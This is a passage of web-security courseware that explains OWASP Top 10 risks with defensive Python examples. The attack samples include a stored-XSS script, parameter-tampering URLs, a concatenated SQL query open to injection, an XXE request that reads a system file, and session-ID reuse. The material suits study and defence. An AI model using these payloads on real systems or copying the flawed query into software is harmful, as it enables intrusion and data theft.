For example, an attacker finds a vulnerable comment field on the TechPost.org website. He constructs the script "<script>alert("Hello World")</script>" and submits it together with his comment in the comment field of TechPost. The script, along with the comment, is stored in the web application's database. Whenever a user visits the TechPost page, the injected script runs and the message "Hello World" pops up as soon as the page loads. The alert itself is harmless; what it proves is that attacker-supplied script executes in every visitor's browser with the site's origin. A real payload in the same position would instead steal the visitor's session cookie, issue requests on the visitor's behalf, or redirect the visitor to a malicious site, as in the blog posting example above.


[Figure: the attacker posts the comment "Jason, I love your blog post! - Mark" on the TechPost post "Facebook acquires file-sharing service" with <script>alert("Hello World")</script> injected into it; the comment with the malicious script is stored on the database server behind the web application; when a user visits the TechPost website, the alert pops up as soon as the web page is loaded]

Figure 14.18: XSS Attack in the comment field



A04 - Insecure Design


Insecure design flaws arise in an application because of the improper implementation of
security controls and can lead to crucial vulnerabilities such as SQLi and Open S3 buckets.
Application designers may overlook security threats or have mediocre knowledge about them;
this is a major cause of these vulnerabilities. Such vulnerabilities can directly compromise the
application's security. The next most important factor that leads to these insecurities in design
is the absence of business risk profiling. Attackers initiate the threat modeling of an
application's working process to identify a wide range of flaws and loopholes before exploiting
an insecure design or architecture.
The following are some exploitations that can be performed by software and data integrity
failures:
■ Request forgery
■ Authentication hijacking
■ Identity theft
■ Data loss
■ DoS attacks
Example
Attackers often attempt to exploit poorly implemented APIs, which fail to filter requests
properly. They search for weak APIs that are not integrated with security gateways to
differentiate malicious inputs. Then, they attach malicious code to a vulnerable API. When a
user accesses that API via an application, the malicious code loads along with the database
content on the user's browser.


[Figure panel text: the attacker searches for a poorly implemented API to attach malicious code; the user accesses the API through the application, and the malicious code is loaded along with the database content.]

Figure 14.19: Insecure design attack


A05 - Security Misconfiguration


By exploiting misconfiguration vulnerabilities such as unvalidated inputs, parameter/form tampering, improper error handling, and
insufficient transport layer protection, attackers gain unauthorized access to default accounts, read unused pages, read/write
unprotected files and directories, etc.

Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server,
framework, and custom code

01 Unvalidated Inputs: It refers to a web application vulnerability in which the input from a client is not validated before being
processed by web applications and backend servers

02 Parameter/Form Tampering: It involves the manipulation of parameters exchanged between the client and server to modify
application data

03 Improper Error Handling: It provides insight into source code such as logic flaws and default accounts. Using the information
received from an error message, an attacker identifies vulnerabilities to launch various web application attacks

04 Insufficient Transport Layer Protection: It supports weak algorithms and uses expired or invalid certificates. Using insufficient
transport layer protection exposes user data to untrusted third parties and can lead to account theft

05 Improper Restriction of XXE: It discloses internal files using the file URI handler, internal SMB file shares on unpatched Windows
servers, internal port scanning, remote code execution, and DoS attacks

A05 - Security Misconfiguration


Developers and network administrators should ensure that an entire application stack is
configured properly; otherwise, security misconfiguration can occur at any level of the stack,
including its platform, web server, application server, framework, and custom code. For
instance, if the developer does not configure the server properly, it could result in various
problems that can affect the site security. Problems that lead to such instances include
unvalidated inputs, parameter/form tampering, improper error handling, insufficient transport
layer protection, etc.
• Unvalidated Inputs

Input validation flaws refer to a web application vulnerability whereby input from a
client is not validated before being processed by web applications and backend servers.
No validation or improper validation can make a web application vulnerable to various
input validation attacks. If web applications implement input validation only on the
client side, attackers can easily bypass it by tampering with the HTTP requests, URLs,
headers, form fields, hidden fields, and query strings. Users' login IDs and other related
data are stored in the cookies, which become a means of attack. An attacker exploits
input validation flaws to perform cross-site scripting, buffer overflow, injection attacks,
etc., resulting in data theft and system malfunction.


    string sql = "select * from Users where user = '" + User.Text + "' and pwd = '" + Password.Text + "'";

[Figure panel text: the browser POST request
http://www.certifiedhacker.com/login.aspx?user=Jasons&pass=springfield is concatenated, without validation by the web
application, into the query above, and the modified query is sent to the database.]

Figure 14.20: Unvalidated Input attack
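As an added example (not code from the courseware), the concatenated query from the figure beside a parameterized version and a server-side allow-list check, run against a constructed in-memory SQLite table; the username policy in username_is_valid is a hypothetical one chosen for the example:

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data so the example runs offline: one user, the figure's credentials."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.execute("INSERT INTO Users VALUES ('Jasons', 'springfield')")
    conn.commit()
    return conn


def login_concatenated(conn, user: str, pwd: str):
    """Unvalidated input, as in the figure: the request values are pasted into the SQL
    text, so a quote character in the input becomes part of the statement itself."""
    sql = ("select * from Users where user = '" + user
           + "' and pwd = '" + pwd + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, user: str, pwd: str):
    """Hardened form: placeholders hand the values to the driver as data, never as SQL."""
    sql = "select * from Users where user = ? and pwd = ?"
    return conn.execute(sql, (user, pwd)).fetchall()


def username_is_valid(user: str) -> bool:
    """Server-side allow-list (hypothetical policy): 1-32 characters of [A-Za-z0-9_].
    Client-side checks alone do not count, because the request can be edited freely."""
    return re.fullmatch(r"[A-Za-z0-9_]{1,32}", user) is not None


def compare_handlers(conn, user: str, pwd: str) -> dict:
    """Run both handlers on the same input and report what each one did."""
    try:
        concat = login_concatenated(conn, user, pwd)
    except sqlite3.OperationalError as exc:
        # The input changed the grammar of the statement: this is the injection surface.
        concat = f"SQL error: {exc}"
    return {
        "input_accepted_by_allow_list": username_is_valid(user),
        "concatenated": concat,
        "parameterized": login_parameterized(conn, user, pwd),
    }


if __name__ == "__main__":
    db = build_db()
    print(compare_handlers(db, "Jasons", "springfield"))
    # A name containing a quote: the concatenated query breaks, the parameterized one
    # simply finds no such user, and the allow-list rejects it before any query runs.
    print(compare_handlers(db, "O'Brien", "springfield"))
```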

• Parameter/Form Tampering

A web parameter tampering attack involves the manipulation of parameters exchanged
between the client and the server to modify application data such as user credentials
and permissions, prices, and quantities of products. This information is actually stored in
cookies, hidden form fields, or URL query strings. The web application uses it to increase
its functionality and control. A man-in-the-middle (MITM) attack is an example of this
type of attack. Attackers use tools such as WebScarab and WebSploit Framework for
these attacks.
Parameter tampering is a simple type of attack aimed directly at an application's
business logic. It takes advantage of the fact that many programmers rely on hidden or
fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security
measure for certain operations. To bypass this security mechanism, an attacker can
change these parameters. A parameter tampering attack exploits vulnerabilities in
integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.
Detailed Description:

After a session is established between the web application and the user, an exchange of
parameters between the web browser and the web application takes place to maintain
information about a client's session, which eliminates the need to maintain a complex
database on the server side. A web application uses URL queries, form fields, and
cookies to pass these parameters.
Changing parameters in the form field is the best example of parameter tampering.
When a user selects an HTML page, it is stored as a form field value and transferred as
an HTTP page to the web application. These values may be pre-selected (combo box,
checkbox, radio buttons, etc.), free text, or hidden. An attacker can manipulate these
values. In some extreme cases, the attack involves saving the page, editing the HTML,
and reloading the page in the web browser.
Hidden fields that are invisible to the end user provide information status to the web
application. For example, consider a product order form that includes the following
hidden field:
<input type="hidden" name="price" value="99.90">


Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters
used to transfer information between different pages while allowing the user to select
one of several predefined values. In a parameter tampering attack, an attacker may
manipulate these values.
For example, consider a form that includes the following combo box:
<FORM METHOD=POST ACTION="xferMoney.asp">
Source Account: <SELECT NAME="SrcAcc">
<OPTION VALUE="123456789">******789</OPTION>
<OPTION VALUE="868686868">******868</OPTION></SELECT>
<BR>Amount: <INPUT NAME="Amount" SIZE=20>
<BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
<BR><INPUT TYPE=SUBMIT><INPUT TYPE=RESET>
</FORM>

Bypassing:
An attacker may bypass the need to choose between two accounts by adding another
account in the HTML page source code. The web browser displays the new combo box,
and the attacker can choose the new account.
HTML forms submit their results using one of two methods: GET or POST. In the GET
method, all form parameters and their values appear in the query string of the next URL,
which the user sees. An attacker may tamper with this query string. For example,
consider a web page that allows an authenticated user to select one of his or her
accounts from a combo box and debit the account with a fixed unit amount. When the
user clicks on a submit button in the web browser, the URL request is as follows:
http://www.certifiedhackerbank.com/cust.asp?profile=21&debit=2500

The attacker may change the URL parameters (profile and debit) to debit another
account:
http://www.certifiedhackerbank.com/cust.asp?profile=82&debit=1500

The attacker can modify other URL parameters, including attribute parameters and
internal modules. Attribute parameters are unique parameters that characterize the
behavior of the uploading page. For example, consider a content-sharing web
application that enables the content creator to modify the content, while other users
can only view the content. The web server checks whether the user who is accessing an
entry is the author or not (usually via cookies). An ordinary user will request the
following link:
http://www.certifiedhackerbank.com/stat.asp?pg=531&status=view

The attacker can modify the status parameter to "delete" to delete permission for the
content.
http://www.certifiedhackerbank.com/stat.asp?pg=147&status=delete


Parameter/form tampering can lead to theft of services, escalation of access, session
hijacking, and assuming the identity of other users, as well as parameters that grant
access to the developer and debugging information.

[Figure panel text: tampering with the URL parameters,
http://www.certifiedhackerbank.com/cust.asp?profile=82&debit=1500; other parameters can be changed, including attribute
parameters, http://www.certifiedhackerbank.com/stat.asp?pg=147&status=delete]

Figure 14.21: Parameter Tampering attack example
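As an added example (not from the courseware), server-side handling of the three tampering cases above: the hidden price field, the xferMoney.asp combo box, and the stat.asp status parameter. The catalogue, account-ownership and authorship tables are constructed stand-ins for the application's database, and the user names are hypothetical.

```python
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs, urlsplit

# Constructed server-side state standing in for the application's database.
CATALOGUE = {"SKU-1001": Decimal("99.90")}          # authoritative prices
ACCOUNT_OWNER = {"123456789": "jason", "868686868": "jason", "555555555": "mark"}
CONTENT_AUTHOR = {531: "jason", 147: "mark"}
AUDIT_LOG = []                                      # tampering attempts, for detection


def _flag(user, what):
    """Record a rejected request and return the (ok, reason) pair the handlers use."""
    AUDIT_LOG.append({"user": user, "event": what})
    return False, what


def price_order(form: dict, user: str):
    """The hidden 'price' field is never trusted; the price comes from the catalogue.
    Returns (True, total) or (False, reason)."""
    sku = form.get("sku", "")
    if sku not in CATALOGUE:
        return _flag(user, "unknown sku")
    try:
        qty = int(form.get("qty", "1"))
    except ValueError:
        return _flag(user, "non-numeric qty")
    if not 1 <= qty <= 99:
        return _flag(user, "qty out of range")
    if "price" in form and form["price"] != str(CATALOGUE[sku]):
        # Serve the order at the real price, but record the mismatch: a client that
        # edited the hidden field is worth a look in the logs.
        AUDIT_LOG.append({"user": user, "event": "hidden price field modified"})
    return True, CATALOGUE[sku] * qty


def transfer(form: dict, user: str):
    """xferMoney.asp: SrcAcc must belong to the logged-in user, whatever the combo
    box offered; an account added to the page source fails this check."""
    src = form.get("SrcAcc", "")
    if ACCOUNT_OWNER.get(src) != user:
        return _flag(user, "source account not owned by user")
    try:
        amount = Decimal(form.get("Amount", ""))
    except InvalidOperation:
        return _flag(user, "non-numeric amount")
    if amount <= 0 or amount != amount.quantize(Decimal("0.01")):
        return _flag(user, "amount not a positive two-decimal value")
    return True, (src, form.get("DestAcc", ""), amount)


def content_action(url: str, user: str):
    """stat.asp?pg=...&status=...: 'view' is open to everyone; anything else
    requires the requesting user to be the author of the entry."""
    query = parse_qs(urlsplit(url).query)
    try:
        pg = int(query.get("pg", [""])[0])
    except ValueError:
        return _flag(user, "non-numeric pg")
    status = query.get("status", ["view"])[0]
    if status not in ("view", "edit", "delete"):
        return _flag(user, "unknown status value")
    if status != "view" and CONTENT_AUTHOR.get(pg) != user:
        return _flag(user, f"{status} on pg={pg} by non-author")
    return True, (pg, status)
```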

■ Improper Error Handling

It is necessary to define how a system or network should behave when an error occurs.
Otherwise, the error may provide a chance for an attacker to break into the system.
Improper error handling may lead to DoS attacks.
Improper error handling provides insights into the source code, such as logic flaws and
default accounts, which the attacker can exploit. Using the information received from an
error message, an attacker identifies vulnerabilities for launching various web
application attacks. Improper exception handling occurs when web applications do not
limit the amount of information they return to their users. Information leakage may
include helpful error messages and service banners. Developers and system
administrators often forget or disregard how an attacker can use something as simple as
a server banner. The attacker will start searching for a place to identify vulnerabilities
and attempt to leverage information that applications freely volunteer.


General Error

Could not obtain post/user information

DEBUG MODE
SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email,
u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid,
u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p,
nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = '1547' AND pt.post_id = p.post_id
AND u.user_id = p.poster_id ORDER BY
p.post_time ASC LIMIT 0, 15
Line: 435
File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php

Figure 14.22: Screenshot displaying improper errors

The attacker can gather the following information from improper error handling:
o Null pointer exceptions
o System call failure
o Database unavailable
o Network timeout
o Database information
o Web application logical flow
o Application environment
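As an added example (not from the courseware), a response-body check that flags the kinds of internal detail shown in the error screenshot above, beside a handler that returns only a generic message and a reference ID to the client; the sample response is constructed after the figure, and the leak patterns are a starting set, not a complete one.

```python
import logging
import re
import uuid

log = logging.getLogger("webapp")

# Constructed response body modelled on the phpBB-style error page in the figure above.
LEAKY_RESPONSE = """General Error
Could not obtain post/user information
DEBUG MODE
SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
SELECT u.username, u.user_id FROM nuke_bbposts p, nuke_users u WHERE p.topic_id = '1547'
Line: 435
File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php
"""

# Patterns indicating that an error page is volunteering internals to the client.
LEAK_PATTERNS = [
    (r"\bDEBUG MODE\b", "debug mode banner"),
    (r"\bSQL Error:\s*\d+", "database error code"),
    (r"\bSELECT\b.+?\bFROM\b", "SQL statement text"),
    (r"\bLine:\s*\d+", "source line number"),
    (r"(?:/[\w.-]+){2,}\.(?:php|asp|aspx|jsp|py)\b", "server-side file path"),
    (r"Traceback \(most recent call last\)", "stack trace"),
    (r"\b(?:Apache|nginx|Microsoft-IIS)/\d+(?:\.\d+)+", "server version banner"),
]


def find_leaks(body: str) -> list:
    """Detection check: which kinds of internal detail does this response expose?
    Useful over proxy captures or the bodies of 5xx responses in a test run."""
    return [label for pattern, label in LEAK_PATTERNS
            if re.search(pattern, body, re.IGNORECASE | re.DOTALL)]


def safe_error_response(exc: Exception) -> dict:
    """Hardened handler: the client gets a generic message plus a reference ID; the
    exception type, message and stack stay in the server log under that same ID,
    so support can still correlate a user report with the real cause."""
    ref = uuid.uuid4().hex[:12]
    log.error("ref=%s exc=%s detail=%s", ref, type(exc).__name__, exc, exc_info=exc)
    return {"status": 500, "body": f"An internal error occurred. Reference: {ref}"}
```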
■ Insufficient Transport Layer Protection

Insufficient transport layer protection is a security flaw that occurs when an application
fails to protect sensitive traffic flowing in a network. It supports weak algorithms and
uses expired or invalid certificates. Developers should use SSL/TLS authentication for
authentication on the websites; otherwise, an attacker can monitor the network traffic.
Unless communication between websites and clients is encrypted, data can be
intercepted, injected, or redirected. An underprivileged SSL setup can also help the
attacker to launch phishing and MITM attacks.
System compromise may lead to various other threats such as account theft, phishing
attacks, and compromised admin accounts. Thus, insufficient transport layer protection
may allow untrusted third parties to obtain unauthorized access to sensitive


information. All this occurs when applications support weak algorithms used for SSL and
when they use expired or invalid SSL certificates or do not use them correctly.
Example

Assume that a user logs into an online banking application that possesses insufficient
transport layer protection (i.e., it is not SSL encrypted). The sensitive data in the
communication (e.g., session ID) can be vulnerable to attack during transit in plaintext
format. This allows an attacker to steal such data to perform various types of attacks on
the application.
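As an added example (not from the courseware), an audit of a client-side TLS configuration against the weaknesses described above: disabled certificate verification (which is what makes expired or invalid certificates go unnoticed), a disabled hostname check, old protocol versions and weak cipher suites. It uses Python's standard ssl module only; the cipher-name markers are an assumed, partial list.

```python
import ssl

# Cipher-name fragments that mark the weak algorithms the text refers to (partial list).
WEAK_CIPHER_MARKERS = ("RC4", "DES", "MD5", "NULL", "EXPORT", "ADH", "AECDH")


def audit_tls_context(ctx: ssl.SSLContext) -> list:
    """Return the transport-layer weaknesses a client context would tolerate."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("certificate verification disabled: expired, self-signed or "
                        "forged server certificates are accepted")
    if not ctx.check_hostname:
        findings.append("hostname check disabled: a valid certificate for any other "
                        "name is accepted, which enables MITM")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append(f"minimum protocol version is {ctx.minimum_version.name}; "
                        "TLS 1.0/1.1 must be disabled")
    weak = sorted({c["name"] for c in ctx.get_ciphers()
                   if any(marker in c["name"] for marker in WEAK_CIPHER_MARKERS)})
    if weak:
        findings.append("weak cipher suites enabled: " + ", ".join(weak))
    return findings


def hardened_client_context() -> ssl.SSLContext:
    """What an application should use: verified certificates, hostname check, TLS 1.2+."""
    ctx = ssl.create_default_context()      # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def weak_client_context() -> ssl.SSLContext:
    """Constructed for contrast: the 'silence the certificate warning' setup that turns
    an expired or invalid certificate into a non-event for whoever is in the middle."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False              # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


if __name__ == "__main__":
    for name, ctx in (("hardened", hardened_client_context()),
                      ("weak", weak_client_context())):
        print(name, audit_tls_context(ctx) or ["no findings"])
```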
■ Improper Restriction of XML External Entity (XXE)

Many older or poorly configured XML processors evaluate external entity references
within XML documents. External entities can disclose internal files using the file URI
handler, internal SMB file shares on unpatched Windows servers, internal port scanning,
remote code execution, and DoS attacks such as the billion laughs attack.
Some server configuration problems are as follows:
■ Missing security hardening
■ Server software flaws
■ Enabling unnecessary services
■ Improper authentication
■ Unpatched security flaws
■ Server configuration problems
■ Default accounts with default credentials
■ Legacy software
Automated scanners help to detect a few of these problems. Attackers can access default
accounts, unused pages, unpatched flaws, unprotected files and directories, and so on to gain
unauthorized access. The person responsible should take care of all such unnecessary and
unsafe features. Disabling them completely would prove to be highly beneficial, preventing
outsiders from using them for malicious attacks. To avoid leakage of crucial information to
attackers, the network administrator should thus take care of all application-based files through
proper authentication and strong security methods. For example, if the application server
admin console is automatically installed and not removed, and the default accounts are not
changed, then the attacker discovers the standard admin pages on the server, logs in with
default passwords, and establishes control over the server.


XML External Entity (XXE)

An XML External Entity attack is a server-side request forgery (SSRF) attack that can occur when a misconfigured XML parser
allows applications to parse XML input from an unreliable source

Attackers can refer a victim's web application to an external entity by including the reference in the malicious XML input

When this malicious input is processed by the weakly configured XML parser of a target web application, it enables the
attacker to access protected files and services from servers or connected networks


XML External Entity (XXE)


An XML External Entity attack is a Server-side Request Forgery (SSRF) attack whereby an
application can parse XML input from an unreliable source because of the misconfigured XML
parser. In this attack, an attacker sends a malicious XML input containing a reference to an
external entity to the victim's web application. When this malicious input is processed by a
weakly configured XML parser of the target web application, it enables the attacker to access
protected files and services from servers or connected networks.
Since XML features are widely available, the attacker abuses these features to create
documents or files dynamically at the time of processing. Attackers tend to make the most of
this attack, as it allows them to retrieve confidential data, perform DoS attacks, and obtain
sensitive information via HTTP(S); in some worst-case scenarios, they may even be able to
perform remote code execution or launch a CSRF attack on any vulnerable service.
According to the XML 1.0 standard, XML uses entities, often defined as storage units. Entities
are special features of XML that can access local or remote contents, and they are defined
anywhere in a system via system identifiers. The entities need not be part of an XML document,
as they can come from an external system as well. The system identifiers, which act as URIs, are
used by the XML processor while processing the entity. The XML parsing process replaces these
entities with their actual data, and the attacker exploits this behavior by forcing the
XML parser to access the file or the contents he/she specifies. This attack can be all the more
dangerous because the XML documents are processed by a trusted application; the attacker
can abuse that processing to pivot into the internal system and acquire all sorts of internal data.
For example, the attacker sends the following code to extract the system data from the
vulnerable target.


Malicious Request:
POST http://certifiedhacker.com/xml HTTP/1.1
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "file:///etc/lsb-release">
]>
<foo>&bar;</foo>

Response:
HTTP/1.0 200 OK
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 18.04 LTS"

[Figure panel text: the attacker sends the malicious request to www.certifiedhacker.com, a web application with a weakly
configured XML parser, and receives the contents of /etc/lsb-release in the response.]

Figure 14.23: XML External Entity (XXE) attack
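As an added example (not from the courseware), the parser-side guard that stops the request above: an application that never needs DTDs rejects any DOCTYPE or ENTITY declaration before parsing, which also covers parameter entities and entity-expansion (billion laughs) input, plus a classifier for the alert text. The request bodies are constructed after the figure, and the code uses only Python's standard library.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request bodies: the first is modelled on the figure above.
MALICIOUS_BODY = (b'<!DOCTYPE foo [\n'
                  b'<!ELEMENT foo ANY>\n'
                  b'<!ENTITY bar SYSTEM "file:///etc/lsb-release">\n'
                  b']>\n'
                  b'<foo>&bar;</foo>')
BENIGN_BODY = b'<?xml version="1.0"?><foo>hello</foo>'

_DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def safe_parse_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted client without ever evaluating a DTD.
    This application does not need DTDs, so any DOCTYPE/ENTITY declaration is
    rejected before the parser sees it; that removes external entities, parameter
    entities and entity-expansion attacks in one check."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        # The marker scan below is byte-based; refuse encodings it cannot see through.
        raise ValueError("only UTF-8 request bodies are accepted")
    if _DTD_MARKER.search(data):
        raise ValueError("XML input with DOCTYPE/ENTITY declarations is not accepted")
    return ET.fromstring(data)


def check_xml_request(data: bytes):
    """Wrapper returning (accepted, detail): the root tag when accepted, else the reason."""
    try:
        root = safe_parse_xml(data)
    except ValueError as exc:
        return False, str(exc)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    return True, root.tag


def xxe_indicators(data: bytes) -> list:
    """Detection side: classify what a rejected body was declaring, for the alert text."""
    checks = [
        (rb'<!ENTITY\s+\S+\s+SYSTEM\s+"file:', "external entity reading a local file"),
        (rb'<!ENTITY\s+\S+\s+SYSTEM\s+"https?:', "external entity fetching a URL (SSRF)"),
        (rb"<!ENTITY\s+%", "parameter entity (external DTD loading)"),
        (rb'<!ENTITY\s+\S+\s+"[^"]*&\S+;', "entity expansion (billion laughs)"),
    ]
    return [label for pattern, label in checks if re.search(pattern, data, re.IGNORECASE)]
```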


A06 - Vulnerable and Outdated Components/Using Components with Known Vulnerabilities

Most web applications that use components such as libraries and frameworks always execute them with full privileges, and
flaws in any component can result in serious impact

Attackers can identify weak components or dependencies by scanning or by performing manual analysis

Attackers search for any vulnerabilities on exploit sites such as Exploit Database (https://www.exploit-db.com) and CXSecurity
(https://cxsecurity.com)

If a vulnerable component is identified, the attacker customizes the exploit as required and executes the attack

Successful exploitation allows the attacker to cause serious data loss or take full control of the servers

[Slide screenshot: Exploit Database (https://www.exploit-db.com) search results for "web application"; the same listing is
reproduced in Figure 14.25.]

A06 - Vulnerable and Outdated Components/Using Components with Known Vulnerabilities
Components such as libraries and frameworks that are used in most web applications always
execute with full privileges, and flaws in any component can have severe consequences.
Attackers can identify weak components or dependencies by scanning or by performing manual
analysis. Attackers search for any vulnerabilities on exploit sites such as Exploit Database
(https://www.exploit-db.com), CXSecurity (https://cxsecurity.com), and Zero Day Initiative
(https://www.zerodayinitiative.com). If a vulnerable component is identified, the attacker
customizes the exploit as required and executes the attack. Successful exploitation allows the
attacker to cause serious data loss or take over control of the servers. An attacker generally
uses exploit sites to identify the web application exploits or performs vulnerability scanning
using tools such as Nessus and GFI LanGuard to identify the existing vulnerable components.

[Figure panel text: the attacker takes over control of the web servers running a web application with known vulnerable
components.]

Figure 14.24: Attack on a web application with known vulnerable components


[Screenshot: Exploit Database search for "web application" (filters: Verified, Has App); results shown:]

Date       | Verified | Title                                                                                   | Type    | Platform | Author
2021-01-06 |          | Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)              | WebApps | PHP      | Arnav Tripathy
2021-01-05 |          | Resumes Management and Job Application Website 1.0 - Authentication Bypass              | WebApps | PHP      | Kshitiz Raj
2019-12-09 |          | Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution                 | WebApps | Hardware | Hodorsec
2019-06-05 | yes      | IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit) | Remote | Windows | Metasploit
2019-05-29 |          | Oracle Application Testing Suite - Weblogic Server Administration Console War Deployment (Metasploit) | Remote | Java | Metasploit
2019-01-14 |          | Twilio WEB To Fax Machine System Application 1.0 - SQL Injection                        | WebApps | PHP      | Ihsan Sencan
2016-07-29 |          | Barracuda Web Application Firewall 8.0.1.008 - (Authenticated) Remote Command Execution (Metasploit) | Remote | Linux | xort
2014-08-04 | yes      | Barracuda Web Application Firewall - Authentication Bypass                              | Remote  | Hardware | Nick Hayes
2014-09-01 |          | Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting                | WebApps | Multiple | Prakhar Prasad
2009-12-19 | yes      | Barracuda Web Application Firewall 660 - '/cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities | Remote | Hardware | Global-Evolution

Figure 14.25: Screenshot displaying Exploit Database search results for web application exploits

The following are some of the conditions that make applications vulnerable:
■ When all the components' versions from both the server and client sides remain
unknown. This can include nested dependencies as well as components that are being
used directly.
■ When software such as the OSes, database/web/application servers, runtime
environments, and other components are unsupportable, obsolete, or unpatched.
■ When the regular vulnerability scanning process is neglected and not subscribed to the
security updates associated with the components being used.
■ When the primary framework, platform, and dependencies do not receive timely
updates.
■ When the compatibility of software updates or patches is not properly validated or
checked.
■ When proper security is implemented for the configuration files of the components.


A07 - Identification and Authentication Failures/Broken Authentication

Attackers can exploit vulnerabilities in identification, authentication or session management functions such as
exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, and account
update to impersonate users

Session ID in URLs
  http://www.certifiedhackershop.com/sale/saleitems=304;jsessionid=12OMTOIDPXM0OQSABGCKLHCJUN2JV?dest=NewMexico
  Attackers sniff the network traffic or trick users to get session IDs and then reuse those session IDs for malicious
  purposes

Password Exploitation
  Attackers can gain access to a web application's password database. If user passwords are not encrypted, an attacker
  can exploit any user's password

Timeout Exploitation
  If an application's timeouts are not set properly and a user closes their browser without logging out from sites
  accessed through a public computer, an attacker can use the same browser later and exploit that user's privileges

A07 - Identification and Authentication Failures/Broken Authentication


Identification, authentication, and session management include every aspect of user
authentication and management of active sessions. At present, web applications implementing
robust authentication mechanisms fail because of weak credential functions such as "change
my password," "forgot my password," "remember my password," and "account update."
Therefore, developers must take the utmost care when implementing user authentication
securely. It is always preferable to use strong authentication methods through special software-
and hardware-based cryptographic tokens or biometrics. To impersonate users, an attacker
exploits vulnerabilities in the authentication or session management functions such as exposed
accounts, session IDs, logout, password management, timeouts, remember me, secret
question, account update, and others.
• Session ID in URLs
o Example:
A web application creates a session ID when a user logs into
http://certifiedhackershop.com. An attacker uses a sniffer to sniff the
cookie that contains the session ID or tricks the user into disclosing the session ID.
The attacker now enters the following URL in their browser's address bar:
http://certifiedhackershop.com/sale/saleitems=304;jsessionid=12OMTOIDPXM0OQSABGCKLHCJUN2JV?dest=NewMexico
This redirects the attacker to the already logged in page of the victim. Thus, the
attacker successfully impersonates the victim.
If session IDs are exposed in the URL, then the web application is vulnerable to session
fixation attacks.
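As an added example (not from the courseware), a log check that flags requests carrying a session ID in the URL, as in the example above, beside the issuance of a fresh session cookie on login. The access-log lines are constructed (the first uses the URL from the text), the cookie name SESSIONID and the helper names are hypothetical, and only Python's standard library is used.

```python
import re
import secrets
from urllib.parse import parse_qs, urlsplit

SESSION_PARAM_NAMES = {"jsessionid", "phpsessid", "aspsessionid", "sessionid", "sid"}

# Constructed access-log lines in Common Log Format; the first target is the URL from the text.
ACCESS_LOG = [
    '10.0.0.5 - - [06/Jan/2021:10:15:32 +0000] "GET /sale/saleitems=304;jsessionid=12OMTOIDPXM0OQSABGCKLHCJUN2JV?dest=NewMexico HTTP/1.1" 200 5123',
    '10.0.0.9 - - [06/Jan/2021:10:16:01 +0000] "GET /account/summary?PHPSESSID=9f2c1a7e3b HTTP/1.1" 200 2210',
    '10.0.0.7 - - [06/Jan/2021:10:16:45 +0000] "GET /sale/saleitems=304?dest=NewMexico HTTP/1.1" 200 5123',
]
_LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def session_ids_in_url(target: str) -> list:
    """Find session tokens carried in the request line, either as a path parameter
    (...;jsessionid=...) or as a query-string field. Returns (name, value) pairs."""
    parts = urlsplit(target)
    found = []
    for segment in parts.path.split("/"):
        for param in segment.split(";")[1:]:
            name, _, value = param.partition("=")
            if name.lower() in SESSION_PARAM_NAMES:
                found.append((name, value))
    for name, values in parse_qs(parts.query).items():
        if name.lower() in SESSION_PARAM_NAMES:
            found.extend((name, v) for v in values)
    return found


def scan_access_log(lines) -> list:
    """Flag every request whose URL exposes a session ID. Such an ID ends up in browser
    history, proxy logs and Referer headers, so it is treated as already compromised."""
    alerts = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        for name, value in session_ids_in_url(m["target"]):
            alerts.append({"ip": m["ip"], "param": name,
                           "token_prefix": value[:4] + "...",   # never log the full token
                           "action": "invalidate session and re-authenticate"})
    return alerts


def issue_session_cookie(session_store: dict, user: str) -> str:
    """Hardened issuance (hypothetical helper): a fresh random ID on every login, so a
    fixated or previously exposed ID never becomes authenticated, delivered only as a
    cookie the browser will neither put in URLs nor expose to page scripts."""
    session_id = secrets.token_urlsafe(32)
    session_store[session_id] = {"user": user}
    return f"SESSIONID={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"
```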


■ Password Exploitation

For authenticating a user, every web application employs a user identification method
such as an ID and a password. Attackers can identify passwords stored in databases
